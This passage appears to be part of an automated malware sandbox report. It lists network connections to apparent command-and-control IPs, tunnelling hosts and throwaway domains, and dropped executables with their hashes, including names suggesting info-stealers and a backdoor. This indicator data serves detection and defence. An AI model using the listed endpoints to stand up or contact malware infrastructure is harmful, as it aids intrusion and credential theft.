| US | 137.184.144.245:4782 | tcp | |
| SA | 193.122.74.238:1337 | 193.122.74.238 | tcp |
| PK | 182.188.65.58:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | 238.74.122.193.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | www.teknoarge.com | udp |
| TR | 31.145.124.122:80 | www.teknoarge.com | tcp |
| US | 8.8.8.8:53 | 122.124.145.31.in-addr.arpa | udp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| UZ | 87.237.236.86:40500 | udp | |
| US | 8.8.8.8:53 | 86.236.237.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 20.83.148.22:80 | www.zillow.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| HU | 38.180.109.140:20007 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| RU | 193.233.48.194:80 | 193.233.48.194 | tcp |
| US | 8.8.8.8:53 | roaddrermncomplai.shop | udp |
| US | 8.8.8.8:53 | racedsuitreow.shop | udp |
| US | 8.8.8.8:53 | defenddsouneuw.shop | udp |
| US | 8.8.8.8:53 | deallyharvenw.shop | udp |
| US | 8.8.8.8:53 | priooozekw.shop | udp |
| US | 8.8.8.8:53 | pumpkinkwquo.shop | udp |
| US | 8.8.8.8:53 | abortinoiwiam.shop | udp |
| US | 8.8.8.8:53 | surroundeocw.shop | udp |
| US | 8.8.8.8:53 | covvercilverow.shop | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 194.48.233.193.in-addr.arpa | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | marshal-zhukov.com | udp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| IN | 59.91.192.115:40500 | udp | |
| US | 8.8.8.8:53 | 115.192.91.59.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| TR | 31.145.124.122:443 | www.teknoarge.com | tcp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | loeghaiofiehfihf.to | udp |
| RU | 185.215.113.66:80 | loeghaiofiehfihf.to | tcp |
| HU | 38.180.109.140:20007 | tcp | |
| GB | 89.197.154.115:80 | 89.197.154.115 | tcp |
| US | 8.8.8.8:53 | 115.154.197.89.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| GB | 89.197.154.115:7700 | tcp | |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 52.57.120.10:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 10.120.57.52.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | delaylacedmn.site | udp |
| US | 8.8.8.8:53 | famikyjdiag.site | udp |
| US | 8.8.8.8:53 | possiwreeste.site | udp |
| US | 8.8.8.8:53 | commandejorsk.site | udp |
| US | 8.8.8.8:53 | underlinemdsj.site | udp |
| US | 8.8.8.8:53 | bellykmrebk.site | udp |
| US | 8.8.8.8:53 | agentyanlark.site | udp |
| US | 8.8.8.8:53 | writekdmsnu.site | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | dez345-37245.portmap.host | udp |
| PK | 202.70.150.106:40500 | udp | |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.150.70.202.in-addr.arpa | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| DE | 3.78.28.71:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | aiiaiafrzrueuedur.net | udp |
| RU | 185.215.113.66:80 | aiiaiafrzrueuedur.net | tcp |
| HU | 38.180.109.140:20007 | tcp | |
| US | 8.8.8.8:53 | 71.28.78.3.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | wrappyskmwio.store | udp |
| US | 8.8.8.8:53 | questionsmw.store | udp |
| US | 8.8.8.8:53 | soldiefieop.site | udp |
| US | 8.8.8.8:53 | abnomalrkmu.site | udp |
| US | 8.8.8.8:53 | chorusarorp.site | udp |
| US | 8.8.8.8:53 | treatynreit.site | udp |
| US | 8.8.8.8:53 | snarlypagowo.site | udp |
| US | 8.8.8.8:53 | mysterisop.site | udp |
| US | 8.8.8.8:53 | absorptioniw.site | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | egorepetiiiosn.shop | udp |
| US | 8.8.8.8:53 | shelterryujxo.shop | udp |
| US | 8.8.8.8:53 | chequedxmznp.shop | udp |
| US | 8.8.8.8:53 | illnesmunxkza.shop | udp |
| US | 8.8.8.8:53 | triallyforwhgh.shop | udp |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 8.8.8.8:53 | shootydowtqosm.shop | udp |
| US | 8.8.8.8:53 | faceddullinhs.shop | udp |
| US | 8.8.8.8:53 | ammycanedpors.shop | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| IR | 2.177.40.206:40500 | udp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 8.8.8.8:53 | 206.40.177.2.in-addr.arpa | udp |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 18.153.198.123:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 20.83.148.22:80 | 170.114.78.80 | tcp |
| YE | 46.35.79.193:40500 | tcp | |
| US | 8.8.8.8:53 | 123.198.153.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | docs.google.com | udp |
| GB | 142.250.187.206:443 | docs.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.200.3:80 | o.pki.goog | tcp |
| HU | 38.180.109.140:20007 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| IR | 2.191.61.218:40500 | udp | |
| US | 8.8.8.8:53 | 218.61.191.2.in-addr.arpa | udp |
| FR | 176.150.119.15:56001 | tcp | |
| DE | 18.153.198.123:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 0.tcp.in.ngrok.io | udp |
| US | 64.190.113.79:443 | tcp | |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| IR | 2.189.31.47:40500 | udp | |
Files
memory/2124-1685-0x0000000000A20000-0x0000000000EEC000-memory.dmp
memory/2124-1704-0x0000000000A20000-0x0000000000EEC000-memory.dmp
memory/3484-1730-0x0000000000090000-0x0000000000C58000-memory.dmp
memory/3576-1731-0x0000000000A20000-0x0000000000EEC000-memory.dmp
memory/3484-1734-0x0000000000090000-0x0000000000C58000-memory.dmp
memory/3484-1736-0x0000000003600000-0x0000000003692000-memory.dmp
memory/2268-1735-0x0000000000A20000-0x0000000000EEC000-memory.dmp
memory/3484-1737-0x00000000068A0000-0x0000000006E46000-memory.dmp
memory/4316-1748-0x0000000000A20000-0x0000000000EEC000-memory.dmp
memory/3576-1750-0x0000000000A20000-0x0000000000EEC000-memory.dmp
memory/4316-1753-0x0000000000A20000-0x0000000000EEC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
| MD5 | 68a99cf42959dc6406af26e91d39f523 |
| SHA1 | f11db933a83400136dc992820f485e0b73f1b933 |
| SHA256 | c200ddb7b54f8fa4e3acb6671f5fa0a13d54bd41b978d13e336f0497f46244f3 |
| SHA512 | 7342073378d188912b3e7c6be498055ddf48f04c8def8e87c630c69294bcfd0802280babe8f86b88eaed40e983bcf054e527f457bb941c584b6ea54ad0f0aa75 |
memory/1080-1763-0x0000000002450000-0x0000000002486000-memory.dmp
memory/1080-1764-0x0000000004F40000-0x000000000560A000-memory.dmp
memory/1080-1765-0x0000000004E80000-0x0000000004EA2000-memory.dmp
memory/1080-1776-0x0000000005780000-0x00000000057E6000-memory.dmp
memory/1080-1775-0x0000000005710000-0x0000000005776000-memory.dmp
memory/1080-1784-0x00000000057F0000-0x0000000005B47000-memory.dmp
C:\Windows\directx.sys
| MD5 | 4cb71ebef755fb064c648dd98a981b6e |
| SHA1 | 60a847973ba4b39731def0709f590185ade16621 |
| SHA256 | 53e7dcb0046c62c840a34b5c6f01a086746d29261fe8347204c304ac8cd66905 |
| SHA512 | 529d769c056e76472caec4176f00411c1c265283629f2d83e89f07d3f8b7f626cbd309260f5aceba811f276a912b215efe5be1bfc2121aa6c9582a1b5e6f2cff |
memory/4708-1791-0x0000000000080000-0x00000000002E1000-memory.dmp
memory/788-1790-0x0000000000A20000-0x0000000000EEC000-memory.dmp
memory/1080-1792-0x0000000005DC0000-0x0000000005DDE000-memory.dmp
memory/1080-1793-0x0000000005E00000-0x0000000005E4C000-memory.dmp
memory/1080-1799-0x0000000006F90000-0x0000000006FC2000-memory.dmp
memory/1080-1810-0x0000000006FD0000-0x0000000006FEE000-memory.dmp
memory/1080-1800-0x000000006EF30000-0x000000006EF7C000-memory.dmp
memory/1080-1811-0x0000000006FF0000-0x0000000007093000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1001527001\aqbjn3fl.exe
| MD5 | 34a152eb5d1d3e63dafef23579042933 |
| SHA1 | 9e1c23718d5b30c13d0cec51ba3484ddc32a3184 |
| SHA256 | 42365467efe5746a0b0076a3e609219a9cffe827d5a95f4e10221f081a3bf8fa |
| SHA512 | 270298ca39c3ff0ab4c576374a5c091135efad3c1cb9930888a74ef7d421f43039c2545eadecb037fcff2b8ee4e22cd4d809b19e7958b44ba1c72100135a46fe |
memory/1080-1820-0x0000000007770000-0x0000000007DEA000-memory.dmp
memory/1080-1821-0x0000000007130000-0x000000000714A000-memory.dmp
C:\Windows\directx.sys
| MD5 | ff279068a711976404522563df5c3beb |
| SHA1 | 69e5735b9e63ea4dcb5b92a64448ac820bee5196 |
| SHA256 | b6681f47408abe739433a52aee73a58bc1ef637641d4697598a6254168652637 |
| SHA512 | 8a5aa05b140f00387c308555a0e267b629a64cdce2b47aa884d5a00bc758713a7bb4b348920d81a2eadede67f43db5f3c20c3ef63f9d047dae7d707734ad5720 |
memory/1080-1835-0x0000000007190000-0x000000000719A000-memory.dmp
memory/1080-1836-0x00000000073A0000-0x0000000007436000-memory.dmp
memory/3360-1839-0x0000000000A20000-0x0000000000EEC000-memory.dmp
memory/3484-1862-0x00000000076A0000-0x00000000076F0000-memory.dmp
memory/3484-1863-0x00000000078D0000-0x0000000007946000-memory.dmp
memory/3484-1864-0x0000000007950000-0x000000000796E000-memory.dmp
memory/4248-1875-0x0000000005730000-0x0000000005A87000-memory.dmp
memory/4248-1877-0x0000000006300000-0x0000000006322000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1002824001\90b1cecd19.exe
| MD5 | 6a3268db51b26c41418351e516bc33a6 |
| SHA1 | 57a12903fff8cd7ea5aa3a2d2308c910ac455428 |
| SHA256 | eaebfc5e60378bbc47a603ca1310440c290a396cb2446de36ff6e7afb624ee0c |
| SHA512 | 43f257dbb7e444355e29a8023e8c8838c9e0ca7538a86c25ac41db1e0308bf73c3adda1b0fe5d0bcf536387b9ce5f8fed216f5f7d92c80bcc12e7bffde979b33 |
C:\Windows\directx.sys
| MD5 | 52d34d5cc6f04c79f137a32847149b09 |
| SHA1 | 7c99b81eb63b272fef8f71d7b05e610f637cde13 |
| SHA256 | bc0da89e3910714b5ea5610a08beb393e52b49e7665f968e3543eaacda259b1a |
| SHA512 | f343e92f4196bb5d16ea7eac781fb13b5b4b4b375a0ea7650d80ee01bbd4796b3c75e23d32741c96d3d7d299e20219df54532393edcc04c40ca80de06089d97b |
memory/2188-1928-0x00000000001B0000-0x00000000004AB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
| MD5 | c07e06e76de584bcddd59073a4161dbb |
| SHA1 | 08954ac6f6cf51fd5d9d034060a9ae25a8448971 |
| SHA256 | cf67a50598ee170e0d8596f4e22f79cf70e1283b013c3e33e36094e1905ba8d9 |
| SHA512 | e92c9fcd0448591738daedb19e8225ff05da588b48d1f15479ec8af62acd3ea52b5d4ba3e3b0675c2aa1705185f5523dcafdf14137c6e2984588069a2e05309f |
C:\Windows\directx.sys
| MD5 | 0b83a158bc72c093d99c390f94bbf942 |
| SHA1 | 3242eb5ba601149238cf28f3a5d168e7dd9aed6a |
| SHA256 | fcda7bfebd4b117f185004cac008f130936cbc732cfc69e2a781f22dc5c2566a |
| SHA512 | 41667c90e5366c8136655a077a27ea71db9a3f1a195d1bd48c93d9cc5b67fb34d425c502b4955a9e91bb443f3c3bbd752537b50f06a0af400f4d866b65cfff1c |
C:\Windows\directx.sys
| MD5 | 15ebecc758ff08b09c1ce084f05ad69f |
| SHA1 | ccdd4cfc9113b3d2e84e692cd2ca8e592fe7db6a |
| SHA256 | b504604dd5484579e4e6858ef73cb0686e3a969eecb4da177943e0fc84d512c8 |
| SHA512 | ff6c6483f8ad833a9045e269bf6266b0e7ddea1635fbbafc7d14e11f2c1d5766012dff243d30977836ca8fca2eb5bbb59bbff83a028c05fe6fdbf4d7d82ba6e4 |
memory/3484-1965-0x00000000091D0000-0x00000000091E2000-memory.dmp
memory/3484-1964-0x00000000077B0000-0x00000000077BA000-memory.dmp
memory/3620-2008-0x0000000005EE0000-0x0000000006237000-memory.dmp
memory/2188-2019-0x00000000001B0000-0x00000000004AB000-memory.dmp
memory/3620-2029-0x00000000065B0000-0x00000000065FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
| MD5 | 59a9510540fec35043b990deb270b139 |
| SHA1 | 54d66862a4c08ebcba8029ec99d558725603f486 |
| SHA256 | 9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f |
| SHA512 | 011ea8ffe125a6f68f149a0a5b7bcd95197ac8b7d3d7d362807ef984e971411f2b125921fbcbc183e95633555ac58c4e287b6a858f19e077dd9a8eb0975e3e06 |
C:\Windows\directx.sys
| MD5 | 13426aac4abbd498165bdbf1bcbca346 |
| SHA1 | 3987260670fd4d9aaf26183ea8cd12ce97a3067d |
| SHA256 | 9646a15357fd72ada4b40fee9e978865870a83a842182512851a7e6f847f3b26 |
| SHA512 | ee48ef42a9c893d81e4b1e5da297ddf15de085a93aa804846b31acef92d185fc4f97cfd47d7aa2c9b14e0381b8c49c4a149e163dbb2a2863f3f81b32734606b1 |
memory/1276-2046-0x0000000000D90000-0x0000000000DA2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe
| MD5 | 2fe92adf3fe6c95c045d07f3d2ecd2ed |
| SHA1 | 42d1d4b670b60ff3f27c3cc5b8134b67e9c4a138 |
| SHA256 | 13167320a0e8266a56694be70a9560c83e2c645d6eeaa147b9ae585c2960ebb2 |
| SHA512 | 0af7b4a3ce3981707ca450b90829a4a8e933ea3cd3affbce738265a1a0647e96323117db325d0e5e3884f67f36b21b8c955b6c3c6dda21d9b01212e28ef88d65 |
C:\Windows\directx.sys
| MD5 | e86df8ab91b93361ace8d269bf0cfd04 |
| SHA1 | c2facf14233781bc73c701d8d9d1f361a8f1b214 |
| SHA256 | 98288e886d52067e31bb443e155eebc87b92c7d094c42357ac2097ae7d3264ef |
| SHA512 | dfdf60ca05adba7194f5f4b6cdb104eb8a58edb10838f6c5255c6d2aad7e5cfe6f0c5cc11e41093164bb1e628445496fabbbc910af12e5dd46665463f50e7f65 |
memory/3484-2091-0x0000000000090000-0x0000000000C58000-memory.dmp
C:\Windows\directx.sys
| MD5 | 9e06cbaea528ed37c8d88cb88a27a9ff |
| SHA1 | 8c6863473edbbe39d692ede22a57d09076bd40e1 |
| SHA256 | fb23916ef2ef95cabf567d35d79de3209bd357967bbe1aac618b684d06f4ad36 |
| SHA512 | b9ea6e2ef1e35be7ee1e2782452ff4419787792299b30cfd7adf9b37dc6d92d3e6ec36040e6320822e405c7fafe7f79d05975b8430af113041d1726a9bf90754 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 58178700e2f7914aedfd11fb577a63a0 |
| SHA1 | 87c773a2392c142bb5b4e5db73be7103f45cd82f |
| SHA256 | 33912895c35a081e4995bb6f9974c04a6b00f529514cab23b181bf72704df4f6 |
| SHA512 | 3d4f92594fe876b39c0d2e79a2f6f254cf93037a6ecda2d9e51f039e21c11c51bf2fdb2e141ed52d048036c4397c1d288d6c6f59b5709fd6d8c1c780d9c18999 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | daa8f67a577d6952d844ed0bc9fcb106 |
| SHA1 | c9339419695645a02130b1bc8490abe64765fcb4 |
| SHA256 | 1679137361d5696d0421c2ac15b56963d00e684635d3d004c42daf26c6dee4ef |
| SHA512 | d7fe0ad63ee68cb7c75456ca5ccf7e8aa8986bf188b5fd9659e4ce3b8e6645eaa028adf3f07dc0377455dbf006e56da7242dbdd68b326d79ec43be5c12559473 |
memory/3220-2205-0x00000000065B0000-0x00000000065FC000-memory.dmp
memory/3712-2227-0x000000006F0B0000-0x000000006F0FC000-memory.dmp
memory/3220-2237-0x00000000075D0000-0x0000000007673000-memory.dmp
memory/3220-2217-0x000000006F0B0000-0x000000006F0FC000-memory.dmp
memory/3620-2239-0x000000006F0B0000-0x000000006F0FC000-memory.dmp
memory/1624-2250-0x000000006F0B0000-0x000000006F0FC000-memory.dmp
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Users\Admin\AppData\Local\Temp\1003374001\kxfh9qhs.exe
| MD5 | b3834900eea7e3c2bae3ab65bb78664a |
| SHA1 | cf5665241bc0ea70d7856ea75b812619cb31fb94 |
| SHA256 | cc35b0641c3c85446892311031369a42990c019c7b143b875be5c683e83ff3ce |
| SHA512 | ae36ab053e692434b9307a21dcebe6499b60a3d0bca8549d7264b4756565cb44e190aa9396aea087609adaeb1443f098da1787fd8ffe2458c4fa1c5faea15909 |
C:\Windows\directx.sys
| MD5 | a5f9082adf4db96426c657ca60f6809a |
| SHA1 | aa2d0e0a6342710a98605636e07ad6fe41b0e27f |
| SHA256 | 73a9f3e1fe8b0984d08acf309e5ccbc7f717b42ea5251f712b8da8f33926f8ad |
| SHA512 | 50d0a7280b12ca0dac36b35c13576a1d3e5b5bed9ccd079d2d3b0a34db8462f7b7b61f20e72612b65b6c2dc613f3a970bd33c590cc59033ed6bb7894877e6484 |
memory/2252-2532-0x0000000000400000-0x0000000000AD0000-memory.dmp
memory/4708-2550-0x0000000000080000-0x00000000002E1000-memory.dmp
memory/2252-2568-0x0000000000400000-0x0000000000AD0000-memory.dmp
C:\ProgramData\AMMYY\aa_nts.log
| MD5 | 9e5a8822fe99336922970cf445a46470 |
| SHA1 | 5dbc6fa3264249ca47524fba6f2942f9abbd7ffc |
| SHA256 | 97ba8549d7cda421592a621ced0a7bfb22bdbee3e47630019f9f7747af810d12 |
| SHA512 | 3129c3e217a5415823c4680a58f96db8b8d5611c80d314f7fbb45d52889bfa3a2a0b690b9ac9c4286336c5fca6cde67ec1394439f3fbf0a80b7fbe377a416a2d |
C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
| MD5 | 7b5e89271f2f7e9a42d00cd1f1283d0f |
| SHA1 | 8e2a8d2f63713f0499d0df70e61db3ce0ff88b4f |
| SHA256 | fd51fd3388f72dd5eef367bd8848a9e92ae1b218be128e9e75dffdf39ed9438a |
| SHA512 | 3779e92bd1d68644ceb2ef327c7d24667e13d8c927df3f77ec3b542278538b424ea2fa58a7c03554f7bec245e0ba7702853d8d520c528745dafd67653234ab22 |
C:\Windows\directx.sys
| MD5 | 93f0dc7a8d6f9ca9030fa2b648da15af |
| SHA1 | 208cd7fa780028d83e386cc35d025f413553f8e4 |
| SHA256 | 99c2e0ba313cb7775a9676b0c070204ab5efb3cecfd6086dfb7346c0caaa0855 |
| SHA512 | ce5021d45a5f24315d7b1b92ca17b34b12064d919082aa9070a6a7a39abb5a707a87e8f6967b6667abab129b13def7bf17cf5e2a1faf939d2bb467bda3b940df |
C:\Users\Admin\AppData\Local\Temp\1004192001\zq6a1iqg.exe
| MD5 | fd636191c054ea1e9f60d45bb50eaafc |
| SHA1 | 351cda4cd5f58d474126f5a60f92d4296f28121e |
| SHA256 | d8efa36e63e09c7999fa217695f94d05e6ba642588f5a9c8f5807c8c816b93c1 |
| SHA512 | 0e4c0f02081bc77115479f136aa2bbd5a8ec6f1d83119b74ceec3a3ee98116c1557623328095a32fd99d380b9f43b519933e307f333f5c6b927774587fb07436 |
C:\Windows\directx.sys
| MD5 | a3ff7597316d1d28ef00e3169a122e75 |
| SHA1 | 73a485924da02640d7e0cc787dd9be6441d45b06 |
| SHA256 | 730e4de956166d32eb46d9d15719f975afb2b755fa6c7bdd6ae4f6026b6bb117 |
| SHA512 | 5400dcbb810e3725acec47cb3b1c24d08271c0bd685e36c3f2849b4eaf63a3b6c102ba1109fb593b39b895b166bed0f88bac733cf2ac4efbb482420807eadcdd |
memory/3788-3139-0x0000000000050000-0x000000000029E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1004411001\c4d922dfc8.exe
| MD5 | 7b61c4450718e164ef24eeaa347876b3 |
| SHA1 | 7dd322d0cbd66ba5732421c0829b9de2ca93c3a8 |
| SHA256 | 12118dc0b2fdfab013e7bb8c8d2f8525fe09d738f82277811cb8ba6515b9c012 |
| SHA512 | 6b0e3e61fb0dcada99996b3a30a6880c18b9a222a95d46a9008fd1fb6a7c5df8a43fd430fd4c0880a0422ec1d0ec29fd28e566f13e24ccbf3c027fd2306be6ee |
C:\Windows\directx.sys
| MD5 | 301a88827fc6014c82abfaa047b4df9c |
| SHA1 | b63dbda1d8c6a426400215ba544432094532851b |
| SHA256 | 6e5fb109a6939cd3eeb1bb395a83ff4e1dc5ca0026f9686c10e252623bc8bdd0 |
| SHA512 | c2629a1033257d9549cc1caccfb8bb519b2b4c0b4d3465c55f76ae4ce7e9d0856d4945e0ef5272568fdf2fb02913b229f559021179f13085f57e0fc9a292100f |
memory/4712-3207-0x0000000000E00000-0x0000000001481000-memory.dmp
memory/4712-3235-0x0000000000E00000-0x0000000001481000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1004412001\b6b0ba96bf.exe
| MD5 | b7f493cfc8681282fffbb4ed0813a470 |
| SHA1 | 7886d311595a551786307a1542fbef74265ba88a |
| SHA256 | 3cffd3d15cacfae9a60ad6bf2ddde8468f07a852402004d3bc8043b2489f7953 |
| SHA512 | 535073ab85d9a46a8addd6027e79d4778fa1453f6d903763e18e429b1cb513de1b60fb410bc320d7de1a91f8c36ed68a9037b87300b4f8900f74523e971410cc |
C:\Windows\directx.sys
| MD5 | c73946eb3d77982ba5b697d3faf6991d |
| SHA1 | 435eac1156e91c84a16f62c3dcb3b9cf73099b21 |
| SHA256 | e22c9edce75f8941b513f315e19e0d71d24ca7855b28eeec49d5d373ab43310f |
| SHA512 | 2e9d62f824f5eb1326bd80b68d9b75ecd1edfca392afd4155505dfac153370dd3123db858d943de3d9ea9ca117092c60c0673aa99fc9b231c155078ab63f138c |
memory/3788-3438-0x0000000005200000-0x000000000540E000-memory.dmp
memory/3788-3441-0x0000000004C80000-0x0000000004CA2000-memory.dmp
memory/3788-3440-0x0000000005410000-0x00000000055E0000-memory.dmp
C:\Users\Admin\tbtnds.dat
| MD5 | 6147c7ed5cace95256226438451931fe |
| SHA1 | 51fdc22437f4f64e1332d7510036223976aefef7 |
| SHA256 | 5c0458327b3175f7209566aa0bc4dc90999cdd802c1304ef933b3acf088f18e7 |
| SHA512 | a84ef91a1d80044797b5b0c219ec7d7f0c9fda726d6d32c838032aaff1a4dc11a9be3bbc733f309a5e4521fcfb6389ae6cac5308a4f3f1efcfdc020b3f8e7318 |
C:\Users\Admin\AppData\Local\Temp\Files\rrq.exe
| MD5 | 2e0af351f63d046026cea2616654f05c |
| SHA1 | 78c58cd85e76d489607c0ecb4e34fb08d47dc2c2 |
| SHA256 | acfe487c53dc359b3d0e6c78d8a063c5426b09470e161f26d6f27b97fe5b6623 |
| SHA512 | 1534d56c2d5d419e67e375be30039d28c6e6854415eb79f7a5705639d77471f2899791402313e0ac508351f9f777d57f0bfc25ec027bab70c7af5dce212a5661 |
C:\Windows\directx.sys
| MD5 | 52edfc40284d0bb61841573f62660b74 |
| SHA1 | 17c8d1e7162a8f6b65b16e47e1887182f15a599d |
| SHA256 | 772781688958a8c40beb2aa94494367822a3d40c783dc15cf82d33ed32bc07a4 |
| SHA512 | 3e2cda4b5638c5fdac062fae2ece60e3ca9036293d38bb149b7cc638cf6ee57ca91799626e14820df67a964621ff06677c0e56a572b5d165212e711185a725cc |
C:\Users\Admin\AppData\Local\Temp\Files\backd00rhome.exe
| MD5 | ef397426691bc35566bc401598e10d60 |
| SHA1 | 40ac43354d2ea80706dae6a60ce5cb668ba35514 |
| SHA256 | ec34977344bded135083b97756df058d33565bb80a1ab48cccb82999a6b340cf |
| SHA512 | 023009d6a0b923d582a84a6db93b4b4a5c8017ef2217937490e83df801c56b12a962ba88ec4f28bb1fc2aee7ad393d8c93bd097e27b969f061876ac85339e746 |
C:\Windows\directx.sys
| MD5 | 0df9d88ed712840229bac062e768645b |
| SHA1 | a92673436bdf064fe89552424ed26a764ab1f8a0 |
| SHA256 | 4dc8e151103fc5e509c882129f19118a40f5af63b9e5e18112aeac8955558ed1 |
| SHA512 | 96ef9d82a87799a2f5588aacd0f0c870b073c59e7641b567bda6158eb03b1e62fb617f0eec9dca36604bcdf5ed3fbb799f47323b06df170af34e667831c71f89 |
C:\Users\Admin\AppData\Local\Temp\Files\1188%E7%83%88%E7%84%B0.exe
| MD5 | 88783a57777926114b5c5c95af4c943c |
| SHA1 | 6f57492bd78ebc3c3900919e08e039fbc032268a |
| SHA256 | 94132d9dde2b730f4800ee383ddaa63d2e2f92264f07218295d2c5755a414b6a |
| SHA512 | 167abcc77770101d23fcc5cd1df2b57c4fe66be73ea0d1fde7f7132ab5610c214e0af00e6ff981db46cd78e176401f2626aa04217b4caf54a249811bbf79d9c6 |
C:\Windows\directx.sys
| MD5 | 7d3b4766b3a797695752c5fb0f081297 |
| SHA1 | 2230c67e7d65ba3af1daa7ce9f59b0498eac0e94 |
| SHA256 | ed2b4e3eb13976d508a921f1aff9ee83cb91697a444605c21f809d57f5655c2d |
| SHA512 | e4cc4bec96e4c13950c21fb4403f08c5d643915ae502a4b36c8ddd6fce1c5cbe5ed739d2e456e82d9fb35810a944ea93aba9f3ea522e7bc682eb0d9a82766749 |
C:\Users\Admin\AppData\Local\Temp\513022960.exe
| MD5 | cb8420e681f68db1bad5ed24e7b22114 |
| SHA1 | 416fc65d538d3622f5ca71c667a11df88a927c31 |
| SHA256 | 5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea |
| SHA512 | baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf |
C:\Users\Admin\AppData\Local\Temp\287511317.exe
| MD5 | 96509ab828867d81c1693b614b22f41d |
| SHA1 | c5f82005dbda43cedd86708cc5fc3635a781a67e |
| SHA256 | a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744 |
| SHA512 | ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca |
C:\Users\Admin\AppData\Local\Temp\154057176.exe
| MD5 | c38ea1b0838858f21ea572f60c69de0c |
| SHA1 | f5e34c47b0630056ba00df97641926f9579b384a |
